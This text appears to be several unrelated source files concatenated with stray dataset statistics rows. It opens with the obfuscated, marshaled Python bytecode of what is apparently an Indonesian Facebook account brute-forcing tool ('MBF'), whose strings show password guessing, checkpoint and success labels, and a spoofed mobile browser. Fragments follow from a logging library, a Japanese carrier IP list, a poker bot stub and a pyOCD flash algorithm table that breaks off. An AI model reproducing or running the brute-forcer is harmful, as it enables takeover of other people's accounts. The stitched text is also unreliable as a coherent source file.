b\x00|\x03\x00\x83\x01\x00\x01qR\x00Wx\x18\x00|\x01\x00D]\x10\x00}\x03\x00|\x03\x00j\x0c\x00\x83\x00\x00\x01q\x92\x00WWn7\x00\x04t\r\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00d\x0c\x00\x14GHd\r\x00GHd\x0e\x00GHt\x0e\x00d\x0f\x00\x83\x01\x00}\x04\x00t\x0f\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x11\x00\x00\x00Ns\t\x00\x00\x00teman.txtR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s$\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;97m: R\x18\x00\x00\x00i(\x00\x00\x00R\xd8\x00\x00\x00R-\x01\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\x00\x00\x00\x00(\x10\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R\xb4\x00\x00\x00R\x1b\x00\x00\x00R\xb1\x00\x00\x00R.\x01\x00\x00Rn\x00\x00\x00Ro\x00\x00\x00R\xb8\x00\x00\x00R/\x01\x00\x00R#\x00\x00\x00RQ\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x05\x00\x00\x00R0\x01\x00\x00R1\x01\x00\x00R\r\x00\x00\x00R\x12\x00\x00\x00R\xa6\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x80\x00\x00\x00\xff\x04\x00\x00s(\x00\x00\x00\x00\x01\x06\x02\r\x12\x05\x01\t\x01\x0c\x01\x03\x02\x0f\x01\x06\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01R\\\x00\x00\x00s1\x00\x00\x00\n\x1b[32m[\x1b[31m+\x1b[32m] \x1b[1;92mBerhasil \x1b[1;97m--> s\x17\x00\x00\x00\x1b[32mUsername \x1b[1;97m: s0\x00\x00\x00\x1b[33m[\x1b[31m+\x1b[33m] \x1b[1;93mCheckpoint \x1b[1;97m--> s\x19\x00\x00\x00\x1b[1;93mUsername \x1b[1;97m: s\x1f\x00\x00\x00\x1b[31m[+] Gagal \x1b[1;97m--> (\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16(`\x00\x00\x00t\x08\x00\x00\x00platformR\x08\x00\x00\x00Rn\x00\x00\x00R\x9e\x00\x00\x00Ry\x00\x00\x00R\x1f\x00\x00\x00R\t\x00\x00\x00t\t\x00\x00\x00cookielibRv\x00\x00\x00t\x04\x00\x00\x00timeR\x00\x00\x00\x00R7\x00\x00\x00t\x08\x00\x00\x00datetimeR\x01\x00\x00\x00R]\x00\x00\x00R\x1d\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\x15\x00\x00\x00R\n\x00\x00\x00t\t\x00\x00\x00mechanizeR"\x00\x00\x00RE\x00\x00\x00RN\x00\x00\x00t\n\x00\x00\x00fid_bgroupt\n\x00\x00\x00jumlahdataR\xc9\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingt\x07\x00\x00\x00BrowserR@\x00\x00\x00t\x11\x00\x00\x00set_handle_robotst\x05\x00\x00\x00Falset\x10\x00\x00\x00set_handle_equivRU\x00\x00\x00t\x12\x00\x00\x00set_handle_referert\r\x00\x00\x00set_cookiejart\x0c\x00\x00\x00LWPCookieJart\x13\x00\x00\x00set_handle_redirectt\x12\x00\x00\x00set_handle_refresht\x05\x00\x00\x00_httpt\x14\x00\x00\x00HTTPRefreshProcessort\n\x00\x00\x00addheaderst\x0c\x00\x00\x00progress.barR\x05\x00\x00\x00t\x03\x00\x00\x00barR.\x01\x00\x00Rd\x00\x00\x00Rk\x00\x00\x00t\x06\x00\x00\x00finishR\x10\x00\x00\x00R\x14\x00\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R,\x00\x00\x00R&\x00\x00\x00R9\x00\x00\x00RL\x00\x00\x00RT\x00\x00\x00R?\x00\x00\x00Re\x00\x00\x00Rl\x00\x00\x00R.\x00\x00\x00Ro\x00\x00\x00Rm\x00\x00\x00R/\x00\x00\x00R\x7f\x00\x00\x00R\x1e\x00\x00\x00R)\x00\x00\x00R-\x00\x00\x00R\xb8\x00\x00\x00R\xbb\x00\x00\x00R6\x00\x00\x00R1\x00\x00\x00R2\x00\x00\x00R3\x00\x00\x00Ra\x00\x00\x00R\xbc\x00\x00\x00R\xda\x00\x00\x00R\xe4\x00\x00\x00R\xf3\x00\x00\x00R\xbd\x00\x00\x00R\x07\x01\x00\x00R5\x00\x00\x00R4\x00\x00\x00R0\x00\x00\x00R\x81\x00\x00\x00R\x80\x00\x00\x00R\xa5\x00\x00\x00R\x0c\x00\x00\x00R\xae\x00\x00\x00R\x0f\x00\x00\x00R\xaf\x00\x00\x00t\x01\x00\x00\x00cR\xb0\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\xc0\x00\x00\x00\x0c\x01$\x01$\x01\x18\x01\x10\x01\x10\x01\x0c\x01\x03\x01\x10\x01\r\x01\r\x01\x05\x01\x0e\x02\x03\x01\x10\x01\r\x01\r\x01\x05\x01\x0e\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\n\x01\r\x01\x0c\x01\r\x01\r\x01\r\x01\x13\x01\r\x01\x1c\x01\x0c\x02\x03\x01\x14\x01\r\x01\r\x01\x05\x01\x0e\x02\x12\x01\x13\x01\n\x01\n\x01\r\x01\x05\x01\x0e\x02\x0c\x15\t\x0f\t\x06\t\x16\t?\t(\t\x16\t\x1c\t\x0c\t\r\t\x0b\t\x14\t\x0f\x19\x18\t\x06\t\t\t\x1c\t\x0e\t"\t\x1f\t \t\x0f\tP\t&\to\t\x15\t\n\t\t\t\\\t(\t#\t\x19\tA\tb\tO\t)\t(\x07\x01\x05\x01\x15\x01\r\x01\r\x01\x15\x01\r\x01\r\x01\x15\x01\r\x01\x05\x01'''))
| 51,722.5
| 103,430
| 0.719677
| 22,670
| 103,445
| 3.253727
| 0.050904
| 0.248014
| 0.118598
| 0.063122
| 0.773474
| 0.715707
| 0.641726
| 0.577967
| 0.546162
| 0.507917
| 0
| 0.378925
| 0.02903
| 103,445
| 2
| 103,430
| 51,722.5
| 0.355449
| 0
| 0
| 0
| 0
| 0.5
| 0.999584
| 0.729018
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 13
|
1684c76c54fd838fa0beefe73832135730351c30
| 321
|
py
|
Python
|
src/pylogctx/__init__.py
|
bradykieffer/pylogctx
|
1ae9e2dfd27104f3c39e72161a8ee638130ac99a
|
[
"BSD-2-Clause"
] | 18
|
2017-12-19T10:14:51.000Z
|
2020-06-11T11:43:41.000Z
|
src/pylogctx/__init__.py
|
bradykieffer/pylogctx
|
1ae9e2dfd27104f3c39e72161a8ee638130ac99a
|
[
"BSD-2-Clause"
] | 25
|
2017-12-12T17:10:37.000Z
|
2021-06-11T18:33:38.000Z
|
src/pylogctx/__init__.py
|
bradykieffer/pylogctx
|
1ae9e2dfd27104f3c39e72161a8ee638130ac99a
|
[
"BSD-2-Clause"
] | 7
|
2017-12-21T10:52:26.000Z
|
2021-06-11T18:17:32.000Z
|
from .core import (
AdapterNotFound,
AddContextFilter,
AddContextFormatter,
ExcInfoFilter,
LazyAccessor,
context,
log_adapter,
)
__all__ = [
'AdapterNotFound',
'AddContextFilter',
'AddContextFormatter',
'ExcInfoFilter',
'LazyAccessor',
'context',
'log_adapter',
]
| 16.05
| 26
| 0.64486
| 20
| 321
| 10.05
| 0.6
| 0.308458
| 0.497512
| 0.626866
| 0.915423
| 0.915423
| 0.915423
| 0.915423
| 0
| 0
| 0
| 0
| 0.249221
| 321
| 19
| 27
| 16.894737
| 0.834025
| 0
| 0
| 0
| 0
| 0
| 0.28972
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
16abc1dbd76e44fb27d3ec1d724a6acc4aaae1c3
| 112
|
py
|
Python
|
src/__init__.py
|
fabyanMikhael/PIL-Stacks
|
65063e02a6d156a9f1b1370d57296c63699bd408
|
[
"MIT"
] | 2
|
2021-07-18T22:40:42.000Z
|
2021-07-19T23:11:58.000Z
|
src/__init__.py
|
fabyanMikhael/PIL-Stacks
|
65063e02a6d156a9f1b1370d57296c63699bd408
|
[
"MIT"
] | 3
|
2021-05-23T07:30:28.000Z
|
2021-05-26T02:06:21.000Z
|
src/__init__.py
|
fabyanMikhael/PIL-Stacks
|
65063e02a6d156a9f1b1370d57296c63699bd408
|
[
"MIT"
] | 3
|
2021-05-23T03:50:10.000Z
|
2021-05-23T03:59:30.000Z
|
from src.pil_stacks.Editor import *
from src.pil_stacks.Layers import *
from src.pil_stacks.PIL_Stacks import *
| 28
| 39
| 0.8125
| 19
| 112
| 4.578947
| 0.368421
| 0.413793
| 0.344828
| 0.551724
| 0.505747
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 112
| 3
| 40
| 37.333333
| 0.87
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
16c87b5e141afb9de11310a42f1032fc35cfcaa7
| 181
|
py
|
Python
|
uamobile/cidrdata/docomo.py
|
east301/wsgiuseragentmobile-python3
|
ae005c706006144d81e73b893e29f64c0a3101e9
|
[
"MIT"
] | null | null | null |
uamobile/cidrdata/docomo.py
|
east301/wsgiuseragentmobile-python3
|
ae005c706006144d81e73b893e29f64c0a3101e9
|
[
"MIT"
] | null | null | null |
uamobile/cidrdata/docomo.py
|
east301/wsgiuseragentmobile-python3
|
ae005c706006144d81e73b893e29f64c0a3101e9
|
[
"MIT"
] | null | null | null |
DATA = [ '210.153.84.0/24',
'210.136.161.0/24',
'210.153.86.0/24',
'124.146.174.0/24',
'124.146.175.0/24',
'202.229.176.0/24',
'202.229.177.0/24',
'202.229.178.0/24']
| 20.111111
| 27
| 0.541436
| 41
| 181
| 2.390244
| 0.439024
| 0.244898
| 0.183673
| 0.27551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.602564
| 0.138122
| 181
| 8
| 28
| 22.625
| 0.025641
| 0
| 0
| 0
| 0
| 0
| 0.696133
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16ce8312bb8fe9c9bc4bdbb458b86e2b724a45af
| 162
|
py
|
Python
|
abfahrt/testutils/test_generator/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | 1
|
2022-01-30T14:30:02.000Z
|
2022-01-30T14:30:02.000Z
|
abfahrt/testutils/test_generator/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
abfahrt/testutils/test_generator/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
"""
This is the module test_generator for automatic testing/validating random generated input
"""
from abfahrt.testutils.test_generator import test_generator
| 32.4
| 93
| 0.814815
| 21
| 162
| 6.142857
| 0.809524
| 0.302326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 162
| 4
| 94
| 40.5
| 0.914894
| 0.549383
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
16d84b193b051a338115297d671ff95d2ffad501
| 33
|
py
|
Python
|
SSD/SSD_FPN_GIoU/model/__init__.py
|
ForrestPi/ObjectDetection
|
54e0821e73f67be5360c36f01229a123c34ab3b3
|
[
"MIT"
] | 12
|
2020-03-25T01:24:22.000Z
|
2021-09-18T06:40:16.000Z
|
model_ssd/__init__.py
|
Yang-Zhaowei/PowerBank
|
0d6766038bd3ee37036e4255713d5c06e81a83ed
|
[
"MIT"
] | 1
|
2020-04-22T07:52:36.000Z
|
2020-04-22T07:52:36.000Z
|
model_ssd/__init__.py
|
Yang-Zhaowei/PowerBank
|
0d6766038bd3ee37036e4255713d5c06e81a83ed
|
[
"MIT"
] | 4
|
2020-03-25T01:24:26.000Z
|
2020-09-20T11:29:09.000Z
|
from .build_ssd import build_ssd
| 16.5
| 32
| 0.848485
| 6
| 33
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bc87e0641f19b204da0ff231a8fc8709ac1fe854
| 148
|
py
|
Python
|
player.py
|
martaJesztak/poker-player-texas-rangers
|
32a1efc19ebea01e8bbabf95d4828ae419bcba95
|
[
"MIT"
] | null | null | null |
player.py
|
martaJesztak/poker-player-texas-rangers
|
32a1efc19ebea01e8bbabf95d4828ae419bcba95
|
[
"MIT"
] | null | null | null |
player.py
|
martaJesztak/poker-player-texas-rangers
|
32a1efc19ebea01e8bbabf95d4828ae419bcba95
|
[
"MIT"
] | null | null | null |
class Player:
VERSION = "fuck"
def betRequest(self, game_state):
return 10000000
def showdown(self, game_state):
pass
| 16.444444
| 37
| 0.621622
| 17
| 148
| 5.294118
| 0.764706
| 0.177778
| 0.288889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0.297297
| 148
| 8
| 38
| 18.5
| 0.788462
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
bc8c53670087794a343bd2008386076c0630fa45
| 34,684
|
py
|
Python
|
pyocd/target/builtin/target_CY8C6xxA.py
|
jeromecoutant/pyOCD
|
304dfa804231dbe1ea9a9a2d5d7c44eaf9531de1
|
[
"Apache-2.0"
] | null | null | null |
pyocd/target/builtin/target_CY8C6xxA.py
|
jeromecoutant/pyOCD
|
304dfa804231dbe1ea9a9a2d5d7c44eaf9531de1
|
[
"Apache-2.0"
] | null | null | null |
pyocd/target/builtin/target_CY8C6xxA.py
|
jeromecoutant/pyOCD
|
304dfa804231dbe1ea9a9a2d5d7c44eaf9531de1
|
[
"Apache-2.0"
] | null | null | null |
# pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from time import (time, sleep)
from ...core import exceptions
from ...core.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, RomRegion, MemoryMap)
from ...core.target import Target
from ...coresight.cortex_m import CortexM
from ...flash.flash import Flash
from ...utility.notification import Notification
from ...utility.timeout import Timeout
flash_algo_main = {
'load_address': 0x08000000,
# Flash algorithm as a hex string
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x20004603, 0x46014770, 0x47702000, 0xf000b510, 0xbd10f972, 0x4604b510, 0xf0004620, 0xbd10f915,
0x4606b570, 0x4615460c, 0x46294622, 0xf0004630, 0xbd70f969, 0x4604b570, 0x4616460d, 0x46294632,
0xf0004620, 0xbd70f81f, 0x47706001, 0x600a6802, 0x21004770, 0x1c49e000, 0x43424ad6, 0xd8fa428a,
0xb5084770, 0x48d44669, 0xfff0f7ff, 0x0209210f, 0x40089800, 0xd1012800, 0xe0002001, 0x46032000,
0xbd084618, 0x4603b570, 0x461d460c, 0xe0052100, 0x5c6e5c50, 0xd00042b0, 0x1c49e002, 0xd3f742a1,
0x1858bf00, 0xb5febd70, 0x460b4605, 0x20004616, 0x24009002, 0x01682700, 0x184049c0, 0xbf009000,
0x9800a901, 0xf7ff301c, 0x9801ffc1, 0x2b000fc7, 0x2f00d001, 0x2b00d103, 0x2f00d103, 0x2001d101,
0x2000e000, 0x2c004604, 0x9802d109, 0xd90042b0, 0x2001e007, 0xffadf7ff, 0x1c409802, 0x2c009002,
0xbf00d0de, 0x21014620, 0xbdfe4048, 0x4604b5f8, 0x2600460d, 0x01602300, 0x184749a8, 0x4669bf00,
0xf7ff4638, 0x9800ff93, 0x2b000fc3, 0x42aed106, 0xe005d900, 0xf7ff2001, 0x1c76ff8c, 0xd0ee2b00,
0x4618bf00, 0x40482101, 0xb5f0bdf8, 0x460d4607, 0x26004613, 0xbf002400, 0x46384619, 0xff76f7ff,
0x0f006818, 0x21050700, 0x42880749, 0x2001d101, 0x2000e000, 0x2c004604, 0x42aed106, 0xe005d900,
0xf7ff2001, 0x1c76ff66, 0xd0e52c00, 0x4620bf00, 0x40482101, 0xb5f3bdf0, 0x4606b082, 0x48882700,
0x90014478, 0x0fc007f0, 0x40482101, 0x25009000, 0xff57f7ff, 0xd0022800, 0x4d802400, 0x2401e002,
0x35204d7e, 0x31f521ff, 0xf7ff4620, 0x4607ff9f, 0xd1362f00, 0x28009800, 0x4628d005, 0x9901300c,
0xff32f7ff, 0x4631e004, 0x300c4628, 0xff2cf7ff, 0x30104620, 0x40822201, 0x48724611, 0xff24f7ff,
0x46282101, 0xf7ff3008, 0x22ffff1f, 0x210032f5, 0xf7ff4620, 0x4607ff48, 0xd1122f00, 0x28009800,
0x21ffd007, 0x9a0331f5, 0xf7ff9801, 0x4607ff8e, 0x21ffe007, 0x462831f5, 0x9a03300c, 0xff85f7ff,
0x46384607, 0xbdf0b004, 0x4604b538, 0x447d4d5c, 0x495d3dae, 0xf7ff4628, 0x4621fef7, 0xf7ff1d28,
0x4669fef3, 0xf7ff4858, 0xbd38ff96, 0x4604b538, 0x447d4d53, 0x49553dd2, 0xf7ff4628, 0x4621fee5,
0xf7ff1d28, 0x4669fee1, 0xf7ff4850, 0xbd38ff84, 0x4604b538, 0x447d4d4a, 0x494c3df6, 0xf7ff4628,
0x4621fed3, 0xf7ff1d28, 0x4669fecf, 0xf7ff4847, 0xbd38ff72, 0x4c46b518, 0x4946447c, 0xf7ff4620,
0x4669fec3, 0xf7ff4843, 0xbd18ff66, 0x4606b570, 0x2500460c, 0x4630e00a, 0xffb6f7ff, 0x2d004605,
0xe005d000, 0x36ff36ff, 0x1e643602, 0xd1f22c00, 0x4628bf00, 0xb510bd70, 0xf7ff2400, 0x4604ffdb,
0xbd104620, 0x4605b5f8, 0x4617460e, 0x447c4c30, 0x49313c56, 0xf7ff4620, 0x21fffe97, 0x1d203107,
0xfe92f7ff, 0x46204629, 0xf7ff3008, 0x4631fe8d, 0x300c4620, 0xfe88f7ff, 0x48274669, 0xff2bf7ff,
0xb5f8bdf8, 0x460e4605, 0x4c214617, 0x3c94447c, 0x46204922, 0xfe78f7ff, 0x310721ff, 0xf7ff1d20,
0x4629fe73, 0x30084620, 0xfe6ef7ff, 0x46204631, 0xf7ff300c, 0x4669fe69, 0xf7ff4818, 0xbdf8ff0c,
0xb0ffb570, 0x4605b081, 0x24002600, 0x2000e003, 0x55084669, 0x20011c64, 0x42840240, 0x4602dbf7,
0x46284669, 0xffcdf7ff, 0x46304606, 0xb001b07f, 0x0000bd70, 0x00000d05, 0x40200000, 0x40220000,
0x0000023c, 0x40221008, 0x1c000100, 0x14000100, 0x00000124, 0x0a000100, 0x06000100, 0x05000100,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
